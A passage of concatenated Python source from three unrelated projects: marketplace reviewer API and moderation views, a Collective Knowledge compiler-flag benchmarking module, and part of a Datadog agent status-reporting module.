return redirect(settings.GOOGLE_TRANSLATE_REDIRECT_URL.format(
lang=language, text=review.body))
@waffle_switch('reviews-translate')
@permission_required([('Apps', 'ReadAbuse'), ('Websites', 'ReadAbuse')])
def abuse_report_translate(request, report_pk, language, app_slug=None,
website_pk=None):
if app_slug:
report = get_object_or_404(AbuseReport, addon__app_slug=app_slug,
pk=report_pk)
else:
report = get_object_or_404(AbuseReport, website__id=website_pk,
pk=report_pk)
if '-' in language:
language = language.split('-')[0]
if request.is_ajax():
if report.message is not None:
trans, r = _retrieve_translation(report.message, language)
return http.HttpResponse(json.dumps({'body': trans}),
status=r.status_code)
else:
return redirect(settings.GOOGLE_TRANSLATE_REDIRECT_URL.format(
lang=language, text=report.message))
class ReviewingView(ListAPIView):
authentication_classes = [RestOAuthAuthentication,
RestSharedSecretAuthentication]
permission_classes = [GroupPermission('Apps', 'Review')]
serializer_class = ReviewingSerializer
def get_queryset(self):
return [row['app'] for row in AppsReviewing(self.request).get_apps()]
class ReviewersSearchView(SearchView):
permission_classes = [GroupPermission('Apps', 'Review')]
filter_backends = [SearchQueryFilter, ReviewerSearchFormFilter,
SortingFilter]
form_class = ApiReviewersSearchForm
serializer_class = ReviewersESAppSerializer
class ApproveRegion(SlugOrIdMixin, CreateAPIView):
"""
TODO: Document this API.
"""
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
model = Webapp
slug_field = 'app_slug'
def get_permissions(self):
region = parse_region(self.request.parser_context['kwargs']['region'])
region_slug = region.slug.upper()
return (GroupPermission('Apps', 'ReviewRegion%s' % region_slug),)
def get_queryset(self):
region = parse_region(self.request.parser_context['kwargs']['region'])
return self.model.objects.pending_in_region(region)
def post(self, request, pk, region, *args, **kwargs):
app = self.get_object()
region = parse_region(region)
form = ApproveRegionForm(request.DATA, app=app, region=region)
if not form.is_valid():
raise ParseError(dict(form.errors.items()))
form.save()
return Response({'approved': bool(form.cleaned_data['approve'])})
class _AppAction(SlugOrIdMixin):
permission_classes = [GroupPermission('Apps', 'Review')]
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
model = Webapp
slug_field = 'app_slug'
def _do_post(self, request, pk):
app = self.get_object()
handler = ReviewApp(request, app, app.latest_version, ())
handler.set_data(request.DATA)
return getattr(handler, "process_" + self.verb)()
def post(self, request, pk, *a, **kw):
self._do_post(request, pk)
return Response()
class AppApprove(_AppAction, CreateAPIView):
verb = "approve"
def post(self, request, pk, *a, **kw):
result = self._do_post(request, pk)
if result is None:
return Response(status=409)
return Response({'score': result})
class AppReject(_AppAction, CreateAPIView):
verb = "reject"
def post(self, request, pk, *a, **kw):
result = self._do_post(request, pk)
return Response({'score': result})
class AppInfo(_AppAction, CreateAPIView):
verb = "request_information"
class AppEscalate(_AppAction, CreateAPIView, DestroyAPIView):
permission_classes = [ByHttpMethod({
'options': AllowAny,
'post': GroupPermission('Apps', 'Review'),
'delete': GroupPermission('Apps', 'Edit'),
})]
verb = "escalate"
def delete(self, request, pk, *a, **kw):
app = self.get_object()
handler = ReviewApp(request, app, app.latest_version, ())
handler.set_data(request.QUERY_PARAMS)
handler.process_clear_escalation()
return Response()
class AppDisable(_AppAction, CreateAPIView):
permission_classes = [GroupPermission('Apps', 'Edit')]
verb = "disable"
class AppRereview(_AppAction, DestroyAPIView):
def delete(self, request, pk, *a, **kw):
app = self.get_object()
handler = ReviewApp(request, app, app.latest_version, ())
handler.set_data(request.QUERY_PARAMS)
result = handler.process_clear_rereview()
return Response({'score': result})
class AppReviewerComment(_AppAction, CreateAPIView):
verb = "comment"
class _WebsiteAction(object):
permission_classes = [GroupPermission('Websites', 'Review')]
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
model = Website
class WebsiteApprove(_WebsiteAction, CreateAPIView):
def post(self, request, pk, *a, **kw):
website = self.get_object()
website.update(status=mkt.STATUS_PUBLIC)
return Response()
class WebsiteReject(_WebsiteAction, CreateAPIView):
def post(self, request, pk, *a, **kw):
website = self.get_object()
website.update(status=mkt.STATUS_REJECTED)
return Response()
class UpdateAdditionalReviewViewSet(SlugOrIdMixin, UpdateAPIView):
"""
API ViewSet for setting pass/fail of an AdditionalReview. This does not
follow the DRF convention but instead calls review_passed() or
review_failed() on the AdditionalReview based on request.DATA['passed'].
"""
model = AdditionalReview
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
serializer_class = ReviewerAdditionalReviewSerializer
# TODO: Change this when there is more than just the Tarako queue.
permission_classes = [GroupPermission('Apps', 'ReviewTarako')]
def pre_save(self, additional_review):
additional_review.reviewer = self.request.user
additional_review.review_completed = datetime.datetime.now()
def post_save(self, additional_review, created):
additional_review.execute_post_review_task()
class AppOwnerPermission(BasePermission):
def webapp_exists(self, app_id):
return Webapp.objects.filter(pk=app_id).exists()
def user_is_author(self, app_id, user):
return AddonUser.objects.filter(user=user, addon_id=app_id).exists()
def has_permission(self, request, view):
app_id = request.DATA.get('app')
if not app_id or not self.webapp_exists(app_id):
# Fall through to a 400 for invalid data.
return True
else:
return self.user_is_author(app_id, request.user)
class CreateAdditionalReviewViewSet(CreateAPIView):
"""
API ViewSet for requesting an additional review.
"""
model = AdditionalReview
serializer_class = AdditionalReviewSerializer
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
# TODO: Change this when there is more than just the Tarako queue.
permission_classes = [AnyOf(AppOwnerPermission,
GroupPermission('Apps', 'Edit'))]
def app(self, app_id):
self.app = Webapp.objects.get(pk=app_id)
return self.app
class GenerateToken(SlugOrIdMixin, CreateAPIView):
"""
This generates a short-lived token to be used by the APK factory service
for authentication of requests to the reviewer mini-manifest and package.
"""
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = [GroupPermission('Apps', 'Review')]
model = Webapp
slug_field = 'app_slug'
def post(self, request, pk, *args, **kwargs):
app = self.get_object()
token = Token(data={'app_id': app.id})
token.save()
log.info('Generated token on app:%s for user:%s' % (
app.id, request.user.id))
return Response({'token': token.token})
@never_cache
@json_view
@reviewer_required
def review_viewing(request):
if 'addon_id' not in request.POST:
return {}
addon_id = request.POST['addon_id']
user_id = request.user.id
current_name = ''
is_user = 0
key = '%s:review_viewing:%s' % (settings.CACHE_PREFIX, addon_id)
interval = mkt.EDITOR_VIEWING_INTERVAL
# Check who is viewing.
currently_viewing = cache.get(key)
# If nobody is viewing or current user is, set current user as viewing
if not currently_viewing or currently_viewing == user_id:
# We want to save it for twice as long as the ping interval,
# just to account for latency and the like.
cache.set(key, user_id, interval * 2)
currently_viewing = user_id
current_name = request.user.name
is_user = 1
else:
current_name = UserProfile.objects.get(pk=currently_viewing).name
AppsReviewing(request).add(addon_id)
return {'current': currently_viewing, 'current_name': current_name,
'is_user': is_user, 'interval_seconds': interval}
@never_cache
@json_view
@reviewer_required
def queue_viewing(request):
if 'addon_ids' not in request.POST:
return {}
viewing = {}
user_id = request.user.id
for addon_id in request.POST['addon_ids'].split(','):
addon_id = addon_id.strip()
key = '%s:review_viewing:%s' % (settings.CACHE_PREFIX, addon_id)
currently_viewing = cache.get(key)
if currently_viewing and currently_viewing != user_id:
viewing[addon_id] = (UserProfile.objects
.get(id=currently_viewing)
.display_name)
return viewing
class CannedResponseViewSet(CORSMixin, MarketplaceView, viewsets.ModelViewSet):
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = [GroupPermission('Admin', 'ReviewerTools')]
model = CannedResponse
serializer_class = CannedResponseSerializer
cors_allowed_methods = ['get', 'post', 'patch', 'put', 'delete']
class ReviewerScoreViewSet(CORSMixin, MarketplaceView, viewsets.ModelViewSet):
authentication_classes = (RestOAuthAuthentication,
RestSharedSecretAuthentication)
permission_classes = [GroupPermission('Admin', 'ReviewerTools')]
serializer_class = ReviewerScoreSerializer
cors_allowed_methods = ['get', 'post', 'patch', 'put', 'delete']
# mkt.REVIEWED_MANUAL is the default so we don't need to set it on the
# instance when we are creating a new one, but we do need to set it on
# queryset to prevent instances with other note_key values from ever being
# returned.
queryset = ReviewerScore.objects.filter(note_key=mkt.REVIEWED_MANUAL)
@permission_required([('Apps', 'ModerateReview')])
def moderatelog(request):
form = ModerateLogForm(request.GET)
modlog = ActivityLog.objects.editor_events()
if form.is_valid():
if form.cleaned_data['start']:
modlog = modlog.filter(created__gte=form.cleaned_data['start'])
if form.cleaned_data['end']:
modlog = modlog.filter(created__lt=form.cleaned_data['end'])
if form.cleaned_data['search']:
modlog = modlog.filter(action=form.cleaned_data['search'].id)
pager = paginate(request, modlog, 50)
data = context(request, form=form, pager=pager, tab='moderatelog')
return render(request, 'reviewers/moderatelog.html', data)
@permission_required([('Apps', 'ModerateReview')])
def moderatelog_detail(request, eventlog_id):
log = get_object_or_404(
ActivityLog.objects.editor_events(), pk=eventlog_id)
review = None
if len(log.arguments) > 1 and isinstance(log.arguments[1], Review):
review = log.arguments[1]
form = ModerateLogDetailForm(request.POST or None)
is_admin = acl.action_allowed(request, 'ReviewerAdminTools', 'View')
can_undelete = review and review.deleted and (
is_admin or request.user.pk == log.user.pk)
if (request.method == 'POST' and form.is_valid() and
form.cleaned_data['action'] == 'undelete'):
if not can_undelete:
if not review:
raise RuntimeError('Review doesn`t exist.')
elif not review.deleted:
raise RuntimeError('Review isn`t deleted.')
else:
raise PermissionDenied
ReviewerScore.award_moderation_points(
log.user, review.addon, review.id, undo=True)
review.undelete()
return redirect('reviewers.apps.moderatelog.detail', eventlog_id)
data = context(request, log=log, form=form, review=review,
can_undelete=can_undelete)
return render(request, 'reviewers/moderatelog_detail.html', data)
| |
#
# Collective Knowledge (Check speedup of program versus various compiler flags and data sets)
#
# See CK LICENSE.txt for licensing details
# See CK COPYRIGHT.txt for copyright details
#
# Developer: Grigori Fursin, Grigori.Fursin@cTuning.org, http://fursin.net
#
cfg={} # Will be updated by CK (meta description of this module)
work={} # Will be updated by CK (temporal data)
ck=None # Will be updated by CK (initialized CK kernel)
# Local settings
sep='**********************************************************************'
##############################################################################
# Initialize module
def init(i):
"""
Input: {}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
return {'return':0}
##############################################################################
# describe experiment
def describe(i):
"""
Input: {
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
ck.out(cfg['full_desc'])
return {'return':0}
##############################################################################
# reproduce experiment
def reproduce(i):
"""
Input: {
program_uoa - program UOA to check
(cmd_key) - cmd key
(dataset_uoas) - check dataset UOA
(choices) - dict['flags'] - list of combinations of compiler flags
(host_os) - host OS (detect, if omitted)
(target_os) - OS module to check (if omitted, analyze host)
(device_id) - device id if remote (such as adb)
(stat_repeat) - max statistical repetitions (4 by default)
(check_speedup) - if 'yes', check speedups for the first two optimizations ...
(add_to_pipeline) - add this dict to pipeline
(force_record) - if 'yes', force record even if behavior expected ...
(experiment_repo_uoa) - repo to record experiments (by default "remote-ck")
(experiment_remote_repo_uoa) - if above repo is remote, repo on remote server to record experiments (by default "upload")
(experiment_uoa) - CK entry UOA to record experiments (by default "reproduce-ck-paper-filter-optimization")
}
Output: {
return - return code = 0, if successful
> 0, if error
(error) - error text if return > 0
}
"""
import os
curdir=os.getcwd()
rf=os.path.join(curdir, cfg['report_file'])
puoa=i.get('program_uoa','')
if puoa=='':
return {'return':1, 'error':'program_uoa is not defined.\n\nUse "ck list program" to see available programs.\nUse "ck pull repo:ck-programs" and "ck pull repo:ck-datasets-min" to get a small set of our benchmarks and datasets.'}
choices=i.get('choices',{})
if len(choices)==0:
choices=cfg['choices']
cflags=choices.get('flags',[])
if len(cflags)==0:
return {'return':1, 'error':'choices dictionary doesn\'t have "flags" list'}
ap=i.get('add_to_pipeline',{})
e_repo_uoa=cfg['repository_to_share_results']
e_remote_repo_uoa=cfg['remote_repo_uoa']
e_uoa=cfg['remote_experiment_uoa']
if i.get('experiment_repo_uoa','')!='': e_repo_uoa=i['experiment_repo_uoa']
if i.get('experiment_remote_repo_uoa','')!='': e_remote_repo_uoa=i['experiment_remote_repo_uoa']
if i.get('experiment_uoa','')!='': e_uoa=i['experiment_uoa']
###################################################
# Experiment table
table=[] # Strings (for printing)
otable=[] # Original format
###################################################
ck.out(sep)
ck.out('Loading program meta info ...')
r=ck.access({'action':'load',
'module_uoa':cfg['module_deps']['program'],
'data_uoa':puoa})
if r['return']>0: return r
pd=r['dict']
cmd_key=i.get('cmd_key','')
if cmd_key=='': cmd_key='default'
###################################################
ck.out(sep)
ck.out('Checking available data sets ...')
dsets=i.get('dataset_uoas',[])
dtags=pd.get('run_cmds',{}).get(cmd_key,{}).get('dataset_tags','')
ii={'action':'search',
'module_uoa':cfg['module_deps']['dataset']}
if len(dsets)>0:
ii['data_uoa_list']=dsets
else:
ii['tags']=dtags
r=ck.access(ii)
if r['return']>0: return r
dlist=r['lst']
# Prepare first and second line of table
t=[]
t.append('')
t.append('')
t.append('')
for ds in dlist:
t.append('Dataset '+ds['data_uoa']+':')
table.append(t)
t=[]
t.append('Optimization:')
t.append('Binary size:')
t.append('MD5SUM:')
for ds in dlist:
t.append('min time (s); exp time (s); var (%):')
table.append(t)
# Number of statistical repetitions
srepeat=int(i.get('stat_repeat',0))
if srepeat<1: srepeat=4
repeat=i.get('repeat',-1)
hos=i.get('host_os','')
tos=i.get('target_os','')
tdid=i.get('device_id','')
# will be updated later
deps={}
features={}
xchoices={}
dcomp=''
for cf in cflags:
ck.out(sep)
ck.out('Checking flags "'+cf+'" ...')
t=[]
t.append(cf)
ii={'action':'run',
'module_uoa':cfg['module_deps']['pipeline'],
'data_uoa':cfg['module_deps']['program'],
'program_uoa':puoa,
'host_os':hos,
'target_os':tos,
'device_id':tdid,
'flags':cf,
'repetitions': 1,
'no_run':'yes',
'out':'con'}
if len(ap)>0: ii.update(ap)
if len(deps)>0: ii['dependencies']=deps
r=ck.access(ii)
if r['return']>0: return r
lio=r.get('last_iteration_output',{})
fail=lio.get('fail','')
if fail=='yes':
return {'return':1, 'error':'compilation failed ('+lio.get('fail_reason','')+')- check above output and possibly report to the authors!'}
ed=r.get('experiment_desc',{})
deps=ed.get('dependencies',{})
cc=ed.get('choices',{})
if len(xchoices)==0: xchoices=cc
hos=cc['host_os']
tos=cc['target_os']
tdid=cc['device_id']
ft=ed.get('features',{})
if len(features)==0: features=ft
if dcomp=='': dcomp=ft.get('compiler_version',{}).get('str','')
lsa=r.get('last_stat_analysis',{})
fresults=lsa.get('dict_flat',{})
os=fresults.get('##characteristics#compile#obj_size#min',0)
md5=fresults.get('##characteristics#compile#obj_size#md5_sum','')
t.append(os)
t.append(md5)
# Iterate over datasets
oresults={}
for ds in dlist:
duoa=ds['data_uoa']
duid=ds['data_uid']
ck.out(sep)
ck.out('Running with dataset '+duoa+' ...')
ck.out('')
ij={'action':'run',
'module_uoa':cfg['module_deps']['pipeline'],
'data_uoa':cfg['module_deps']['program'],
'program_uoa':puoa,
'host_os':hos,
'target_os':tos,
'device_id':tdid,
'repetitions': srepeat,
'cmd_key':cmd_key,
'dataset_uoa':duid,
'no_compile':'yes',
'out':'con'}
if len(ap)>0: ij.update(ap)
if repeat>0: ij['repeat']=repeat
r=ck.access(ij)
if r['return']>0: return r
lio=r.get('last_iteration_output',{})
fail=lio.get('fail','')
if fail=='yes':
return {'return':1, 'error':'execution failed ('+lio.get('fail_reason','')+')- check above output and possibly report to the authors!'}
state=lio.get('state',{})
repeat=state['repeat']
lsa=r.get('last_stat_analysis',{})
fresults=lsa.get('dict_flat',{})
texp=fresults.get('##characteristics#run#execution_time_kernel_0#exp',0)
tmin=fresults.get('##characteristics#run#execution_time_kernel_0#min',0)
tdelta=fresults.get('##characteristics#run#execution_time_kernel_0#range_percent',0)
oresults[duoa]=fresults
t.append(' '+('%3.3f' % tmin) + ' ; ' + ('%3.3f' % texp) + ' ; ' + ('%4.1f' % (tdelta*100))+'%')
otable.append(oresults)
table.append(t)
# Draw table
ii={'action':'draw',
'module_uoa':cfg['module_deps']['table'],
'table':table,
'out':'txt'}
r=ck.access(ii)
if r['return']>0: return r
s=r['string']
rft=rf+'.txt'
rfh=rf+'.html'
rfj=rf+'.json'
ck.out(sep)
ck.out('Raw results (exported to '+rf+'.txt, .html, .json):')
if dcomp!='':
ck.out('')
ck.out('Detected compiler version: '+dcomp)
ck.out('')
ck.out(s)
r=ck.save_text_file({'text_file':rft, 'string':s})
if r['return']>0: return r
ii['out']='html'
r=ck.access(ii)
if r['return']>0: return r
html=r['string']
r=ck.save_text_file({'text_file':rfh, 'string':html})
if r['return']>0: return r
# Checking if there is a speedup ...
# Expect that otable[0] - -O3; otable[1] - -O3 -fno-if-conversion
if i.get('check_speedup','')=='yes' and len(otable)>1:
r0d0=otable[0][dlist[0]['data_uoa']]
r0d1=otable[0][dlist[1]['data_uoa']]
r1d0=otable[1][dlist[0]['data_uoa']]
r1d1=otable[1][dlist[1]['data_uoa']]
t0d0=r0d0['##characteristics#run#execution_time_kernel_0#exp']/repeat
t0d1=r0d1['##characteristics#run#execution_time_kernel_0#exp']/repeat
t1d0=r1d0['##characteristics#run#execution_time_kernel_0#exp']/repeat
t1d1=r1d1['##characteristics#run#execution_time_kernel_0#exp']/repeat
sd0=t0d0/t1d0
sd1=t0d1/t1d1
if sd0>1.08 or sd1>1.08 or sd0<0.92 or sd1<0.92 or i.get('force_record','')=='yes':
ck.out(sep)
ck.out('Found speedup or slow down for the first 2 optimizations:')
ck.out('')
ck.out('* Dataset 0 ('+dlist[0]['data_uoa']+') speedup (T_opt0/T_opt1) = '+('%2.2f' % sd0))
ck.out('* Dataset 1 ('+dlist[1]['data_uoa']+') speedup (T_opt0/T_opt1) = '+('%2.2f' % sd1))
ck.out('')
r=ck.inp({'text':'Would you like to share this result with the community and author via public "remote-ck" web service (Y/n): '})
x=r['string'].lower()
if x=='' or x=='yes' or x=='y':
xchoices['optimization_0']=cflags[0]
xchoices['optimization_1']=cflags[1]
xchoices['dataset_uoa_0']=dlist[0]['data_uoa']
xchoices['dataset_uoa_1']=dlist[1]['data_uoa']
xchoices['dataset_uid_0']=dlist[0]['data_uid']
xchoices['dataset_uid_1']=dlist[1]['data_uid']
xchoices['compiler_version']=dcomp
ii={'action':'add',
'module_uoa':cfg['module_deps']['experiment'],
'repo_uoa':e_repo_uoa,
'experiment_repo_uoa':e_remote_repo_uoa,
'experiment_uoa':e_uoa,
'sort_keys':'yes',
'dict':{
'dict':{'subview_uoa':cfg['data_deps']['subview_uoa']},
'tags':['crowdsource experiments','ck-paper','filter','if-conversion','speedup'],
'features':features,
'choices':xchoices,
'characteristics': {
'speedup_0':sd0,
'speedup_1':sd1,
'execution_time_div_by_repeat_opt0_ds0':t0d0,
'execution_time_div_by_repeat_opt0_ds1':t0d1,
'execution_time_div_by_repeat_opt1_ds0':t1d0,
'execution_time_div_by_repeat_opt1_ds1':t1d1
}
}
}
r=ck.access(ii)
if r['return']>0: return r
ck.out('')
ck.out(' Results shared successfully!')
ck.out('')
ck.out(' You can see all shared results at http://cknowledge.org/repo/web.php?wcid=bc0409fb61f0aa82:reproduce-ck-paper-filter-optimization')
else:
ck.out('')
ck.out('Note: speedups/slowdowns were not detected on your platform!')
ck.out('')
ck.out('Thank you for participating in experiment crowdsourcing!')
return {'return':0}
| |
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
"""
This module contains classes which are used to occasionally persist the status
of checks.
"""
# stdlib
from collections import defaultdict
import cPickle as pickle
import datetime
import logging
import os
import platform
import sys
import tempfile
import time
# 3p
import ntplib
import yaml
# project
import config
from config import _is_affirmative, _windows_commondata_path, get_config
from util import plural
from utils.jmx import JMXFiles
from utils.ntp import NTPUtil
from utils.pidfile import PidFile
from utils.platform import Platform
from utils.profile import pretty_statistics
STATUS_OK = 'OK'
STATUS_ERROR = 'ERROR'
STATUS_WARNING = 'WARNING'
NTP_OFFSET_THRESHOLD = 60
log = logging.getLogger(__name__)
class Stylizer(object):
STYLES = {
'bold' : 1,
'grey' : 30,
'red' : 31,
'green' : 32,
'yellow' : 33,
'blue' : 34,
'magenta' : 35,
'cyan' : 36,
'white' : 37,
}
HEADER = '\033[1m'
UNDERLINE = '\033[2m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
RESET = '\033[0m'
ENABLED = False
@classmethod
def stylize(cls, text, *styles):
""" stylize the text. """
if not cls.ENABLED:
return text
# don't bother about escaping, not that complicated.
fmt = '\033[%dm%s'
for style in styles or []:
text = fmt % (cls.STYLES[style], text)
return text + fmt % (0, '') # reset
# a small convienence method
def style(*args):
return Stylizer.stylize(*args)
def logger_info():
loggers = []
root_logger = logging.getLogger()
if len(root_logger.handlers) > 0:
for handler in root_logger.handlers:
if isinstance(handler, logging.StreamHandler):
try:
loggers.append(handler.stream.name)
except AttributeError:
loggers.append("unnamed stream")
if isinstance(handler, logging.handlers.SysLogHandler):
if isinstance(handler.address, basestring):
loggers.append('syslog:%s' % handler.address)
else:
loggers.append('syslog:(%s, %s)' % handler.address)
else:
loggers.append("No loggers configured")
return ', '.join(loggers)
def get_ntp_info():
req_args = NTPUtil().args
ntp_offset = ntplib.NTPClient().request(**req_args).offset
if abs(ntp_offset) > NTP_OFFSET_THRESHOLD:
ntp_styles = ['red', 'bold']
else:
ntp_styles = []
return ntp_offset, ntp_styles
class AgentStatus(object):
"""
A small class used to load and save status messages to the filesystem.
"""
NAME = None
def __init__(self):
self.created_at = datetime.datetime.now()
self.created_by_pid = os.getpid()
def has_error(self):
raise NotImplementedError
def persist(self):
try:
path = self._get_pickle_path()
log.debug("Persisting status to %s" % path)
f = open(path, 'w')
try:
pickle.dump(self, f)
finally:
f.close()
except Exception:
log.exception("Error persisting status")
def created_seconds_ago(self):
td = datetime.datetime.now() - self.created_at
return td.seconds
def render(self):
indent = " "
lines = self._header_lines(indent) + [
indent + l for l in self.body_lines()
] + ["", ""]
return "\n".join(lines)
@classmethod
def _title_lines(self):
name_line = "%s (v %s)" % (self.NAME, config.get_version())
lines = [
"=" * len(name_line),
"%s" % name_line,
"=" * len(name_line),
"",
]
return lines
def _header_lines(self, indent):
# Don't indent the header
lines = self._title_lines()
if self.created_seconds_ago() > 120:
styles = ['red', 'bold']
else:
styles = []
# We color it in red if the status is too old
fields = [
(
style("Status date", *styles),
style("%s (%ss ago)" % (
self.created_at.strftime('%Y-%m-%d %H:%M:%S'),
self.created_seconds_ago()), *styles
)
)
]
fields += [
("Pid", self.created_by_pid),
("Platform", platform.platform()),
("Python Version", "%s, %s" % (
platform.python_version(),
Platform.python_architecture())),
("Logs", logger_info()),
]
for key, value in fields:
l = indent + "%s: %s" % (key, value)
lines.append(l)
return lines + [""]
def to_dict(self):
return {
'pid': self.created_by_pid,
'status_date': "%s (%ss ago)" % (
self.created_at.strftime('%Y-%m-%d %H:%M:%S'),
self.created_seconds_ago()
),
}
@classmethod
def _not_running_message(cls):
lines = cls._title_lines() + [
style(" %s is not running." % cls.NAME, 'red'),
style(""" You can get more details in the logs:
%s""" % logger_info(), 'red'),
"",
""
]
return "\n".join(lines)
@classmethod
def remove_latest_status(cls):
log.debug("Removing latest status")
try:
os.remove(cls._get_pickle_path())
except OSError:
pass
@classmethod
def load_latest_status(cls):
try:
f = open(cls._get_pickle_path())
try:
return pickle.load(f)
finally:
f.close()
except IOError:
return None
@classmethod
def print_latest_status(cls, verbose=False):
cls.verbose = verbose
Stylizer.ENABLED = False
try:
if sys.stdout.isatty():
Stylizer.ENABLED = True
except Exception:
# Don't worry if we can't enable the
# stylizer.
pass
message = cls._not_running_message()
exit_code = -1
module_status = cls.load_latest_status()
if module_status:
message = module_status.render()
exit_code = 0
if module_status.has_error():
exit_code = 1
sys.stdout.write(message)
return exit_code
@classmethod
def _get_pickle_path(cls):
if Platform.is_win32():
path = os.path.join(_windows_commondata_path(), 'Datadog')
if not os.path.isdir(path):
path = tempfile.gettempdir()
elif os.path.isdir(PidFile.get_dir()):
path = PidFile.get_dir()
else:
path = tempfile.gettempdir()
return os.path.join(path, cls.__name__ + '.pickle')
class InstanceStatus(object):
def __init__(self, instance_id, status, error=None, tb=None, warnings=None, metric_count=None,
instance_check_stats=None):
self.instance_id = instance_id
self.status = status
if error is not None:
self.error = repr(error)
else:
self.error = None
self.traceback = tb
self.warnings = warnings
self.metric_count = metric_count
self.instance_check_stats = instance_check_stats
def has_error(self):
return self.status == STATUS_ERROR
def has_warnings(self):
return self.status == STATUS_WARNING
class CheckStatus(object):
def __init__(self, check_name, instance_statuses, metric_count=None,
event_count=None, service_check_count=None, service_metadata=[],
init_failed_error=None, init_failed_traceback=None,
library_versions=None, source_type_name=None,
check_stats=None):
self.name = check_name
self.source_type_name = source_type_name
self.instance_statuses = instance_statuses
self.metric_count = metric_count or 0
self.event_count = event_count or 0
self.service_check_count = service_check_count or 0
self.init_failed_error = init_failed_error
self.init_failed_traceback = init_failed_traceback
self.library_versions = library_versions
self.check_stats = check_stats
self.service_metadata = service_metadata
@property
def status(self):
if self.init_failed_error:
return STATUS_ERROR
for instance_status in self.instance_statuses:
if instance_status.status == STATUS_ERROR:
return STATUS_ERROR
return STATUS_OK
def has_error(self):
return self.status == STATUS_ERROR
class EmitterStatus(object):
def __init__(self, name, error=None):
self.name = name
self.error = None
if error:
self.error = repr(error)
@property
def status(self):
if self.error:
return STATUS_ERROR
else:
return STATUS_OK
def has_error(self):
return self.status != STATUS_OK
class CollectorStatus(AgentStatus):
NAME = 'Collector'
def __init__(self, check_statuses=None, emitter_statuses=None, metadata=None):
AgentStatus.__init__(self)
self.check_statuses = check_statuses or []
self.emitter_statuses = emitter_statuses or []
self.host_metadata = metadata or []
@property
def status(self):
for check_status in self.check_statuses:
if check_status.status == STATUS_ERROR:
return STATUS_ERROR
return STATUS_OK
def has_error(self):
return self.status != STATUS_OK
@staticmethod
def check_status_lines(cs):
check_lines = [
' ' + cs.name,
' ' + '-' * len(cs.name)
]
if cs.init_failed_error:
check_lines.append(" - initialize check class [%s]: %s" %
(style(STATUS_ERROR, 'red'),
repr(cs.init_failed_error)))
if cs.init_failed_traceback:
check_lines.extend(' ' + line for line in
cs.init_failed_traceback.split('\n'))
else:
for s in cs.instance_statuses:
c = 'green'
if s.has_warnings():
c = 'yellow'
if s.has_error():
c = 'red'
line = " - instance #%s [%s]" % (
s.instance_id, style(s.status, c))
if s.has_error():
line += u": %s" % s.error
if s.metric_count is not None:
line += " collected %s metrics" % s.metric_count
if s.instance_check_stats is not None:
line += " Last run duration: %s" % s.instance_check_stats.get('run_time')
check_lines.append(line)
if s.has_warnings():
for warning in s.warnings:
warn = warning.split('\n')
if not len(warn):
continue
check_lines.append(u" %s: %s" %
(style("Warning", 'yellow'), warn[0]))
check_lines.extend(u" %s" % l for l in
warn[1:])
if s.traceback is not None:
check_lines.extend(' ' + line for line in
s.traceback.split('\n'))
check_lines += [
" - Collected %s metric%s, %s event%s & %s service check%s" % (
cs.metric_count, plural(cs.metric_count),
cs.event_count, plural(cs.event_count),
cs.service_check_count, plural(cs.service_check_count)),
]
if cs.check_stats is not None:
check_lines += [
" - Stats: %s" % pretty_statistics(cs.check_stats)
]
if cs.library_versions is not None:
check_lines += [
" - Dependencies:"]
for library, version in cs.library_versions.iteritems():
check_lines += [" - %s: %s" % (library, version)]
check_lines += [""]
return check_lines
@staticmethod
def render_check_status(cs):
indent = " "
lines = [
indent + l for l in CollectorStatus.check_status_lines(cs)
] + ["", ""]
return "\n".join(lines)
def body_lines(self):
# Metadata whitelist
metadata_whitelist = [
'hostname',
'fqdn',
'ipv4',
'instance-id'
]
lines = [
'Clocks',
'======',
''
]
try:
ntp_offset, ntp_styles = get_ntp_info()
lines.append(' ' + style('NTP offset', *ntp_styles) + ': ' + style('%s s' % round(ntp_offset, 4), *ntp_styles))
except Exception as e:
lines.append(' NTP offset: Unknown (%s)' % str(e))
lines.append(' System UTC time: ' + datetime.datetime.utcnow().__str__())
lines.append('')
# Paths to checks.d/conf.d
lines += [
'Paths',
'=====',
''
]
osname = config.get_os()
try:
confd_path = config.get_confd_path(osname)
except config.PathNotFound:
confd_path = 'Not found'
try:
checksd_path = config.get_checksd_path(osname)
except config.PathNotFound:
checksd_path = 'Not found'
lines.append(' conf.d: ' + confd_path)
lines.append(' checks.d: ' + checksd_path)
lines.append('')
# Hostnames
lines += [
'Hostnames',
'=========',
''
]
if not self.host_metadata:
lines.append(" No host information available yet.")
else:
for key, host in self.host_metadata.iteritems():
for whitelist_item in metadata_whitelist:
if whitelist_item in key:
lines.append(" " + key + ": " + host)
break
lines.append('')
# Checks.d Status
lines += [
'Checks',
'======',
''
]
check_statuses = self.check_statuses + get_jmx_status()
if not check_statuses:
lines.append(" No checks have run yet.")
else:
for cs in check_statuses:
check_lines = [
' ' + cs.name,
' ' + '-' * len(cs.name)
]
if cs.init_failed_error:
check_lines.append(" - initialize check class [%s]: %s" %
(style(STATUS_ERROR, 'red'),
repr(cs.init_failed_error)))
if self.verbose and cs.init_failed_traceback:
check_lines.extend(' ' + line for line in
cs.init_failed_traceback.split('\n'))
else:
for s in cs.instance_statuses:
c = 'green'
if s.has_warnings():
c = 'yellow'
if s.has_error():
c = 'red'
line = " - instance #%s [%s]" % (
s.instance_id, style(s.status, c))
if s.has_error():
line += u": %s" % s.error
if s.metric_count is not None:
line += " collected %s metrics" % s.metric_count
if s.instance_check_stats is not None:
line += " Last run duration: %s" % s.instance_check_stats.get('run_time')
check_lines.append(line)
if s.has_warnings():
for warning in s.warnings:
warn = warning.split('\n')
if not len(warn):
continue
check_lines.append(u" %s: %s" %
(style("Warning", 'yellow'), warn[0]))
check_lines.extend(u" %s" % l for l in
warn[1:])
if self.verbose and s.traceback is not None:
